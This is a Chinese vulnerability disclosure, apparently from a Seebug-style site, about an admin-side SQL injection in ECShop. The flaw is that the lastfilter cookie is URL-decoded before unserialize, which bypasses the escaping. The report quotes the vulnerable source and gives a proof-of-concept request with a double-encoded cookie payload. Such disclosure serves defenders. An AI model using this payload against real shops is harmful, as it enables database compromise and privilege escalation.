### 简要描述: 后台的SQL注入,几乎所有的后台功能块都能用此方法注入,进入后台就可以用此提升下自己的权限了,当然,“进入后台”让这个漏洞鸡肋了,你懂的~~~ ### 详细说明: $filter = unserialize(urldecode($_COOKIE['ECSCP']['lastfilter'])); 这一句是核心,urldecode看到了么?所以啊,只要%27、%2527就能绕过init.php里对$_COOKIE的addslashes_deep了~~~ 两个地方: 1.订单详情 ``` /admin/order.php //158行 $filter = unserialize(urldecode($_COOKIE['ECSCP']['lastfilter'])); ``` 2.后台几乎各功能块列表都会用到的get_filter()方法 ``` /admin/includes/lib_main.php //718行 function get_filter($param_str = '') { $filterfile = basename(PHP_SELF, '.php'); if ($param_str) { $filterfile .= $param_str; } if (isset($_GET['uselastfilter']) && isset($_COOKIE['ECSCP']['lastfilterfile']) && $_COOKIE['ECSCP']['lastfilterfile'] == sprintf('%X', crc32($filterfile))) //这虽然麻烦,但可控制 { return array( 'filter' => unserialize(urldecode($_COOKIE['ECSCP']['lastfilter'])), //这里又见重点 'sql' => base64_decode($_COOKIE['ECSCP']['lastfiltersql']) ); } else { return false; } } ``` [<img...
### 简要描述: 后台的SQL注入,几乎所有的后台功能块都能用此方法注入,进入后台就可以用此提升下自己的权限了,当然,“进入后台”让这个漏洞鸡肋了,你懂的~~~ ### 详细说明: $filter = unserialize(urldecode($_COOKIE['ECSCP']['lastfilter'])); 这一句是核心,urldecode看到了么?所以啊,只要%27、%2527就能绕过init.php里对$_COOKIE的addslashes_deep了~~~ 两个地方: 1.订单详情 ``` /admin/order.php //158行 $filter = unserialize(urldecode($_COOKIE['ECSCP']['lastfilter'])); ``` 2.后台几乎各功能块列表都会用到的get_filter()方法 ``` /admin/includes/lib_main.php //718行 function get_filter($param_str = '') { $filterfile = basename(PHP_SELF, '.php'); if ($param_str) { $filterfile .= $param_str; } if (isset($_GET['uselastfilter']) && isset($_COOKIE['ECSCP']['lastfilterfile']) && $_COOKIE['ECSCP']['lastfilterfile'] == sprintf('%X', crc32($filterfile))) //这虽然麻烦,但可控制 { return array( 'filter' => unserialize(urldecode($_COOKIE['ECSCP']['lastfilter'])), //这里又见重点 'sql' => base64_decode($_COOKIE['ECSCP']['lastfiltersql']) ); } else { return false; } } ``` [<img src="https://images.seebug.org/upload/201305/30233022d10958713f5b106401d355797dccc7ce.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/30233022d10958713f5b106401d355797dccc7ce.png) 看接下来的漏洞证明吧~~ ### 漏洞证明: 订单详情的,这个好弄些 [<img src="https://images.seebug.org/upload/201305/3023310777cdf89af7c3f60d64ba151bb60dcf95.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/3023310777cdf89af7c3f60d64ba151bb60dcf95.png) get_filter方法的,拿文章列表来测试,满足触发条件可能麻烦些,说个简单的方法,把条件“==”你控制不了的那一边echo输出出来,然后控制的那一边改一下就好了(我说的不绕口吧?) [<img src="https://images.seebug.org/upload/201305/302334289ae7ca285b303b50398031a86435b58e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/302334289ae7ca285b303b50398031a86435b58e.png) 相关代码(文章列表的,供测试) ``` GET: http://localhost/test/ecshop/admin/article.php?is_ajax=1&uselastfilter=1 POST: act=query&keyword=&cat_id=0 COOKIE: ECSCP[lastfilterfile]=23A0E66; ECSCP[lastfilter]=a%253A1%253A%257Bs%253A5%253A%2522start%2522%253Bs%253A2%253A%25221%2527%2522%253B%257D; //cookie修改这两处 ``` 怎样,有了这个,还要再找后台SQL注入么?
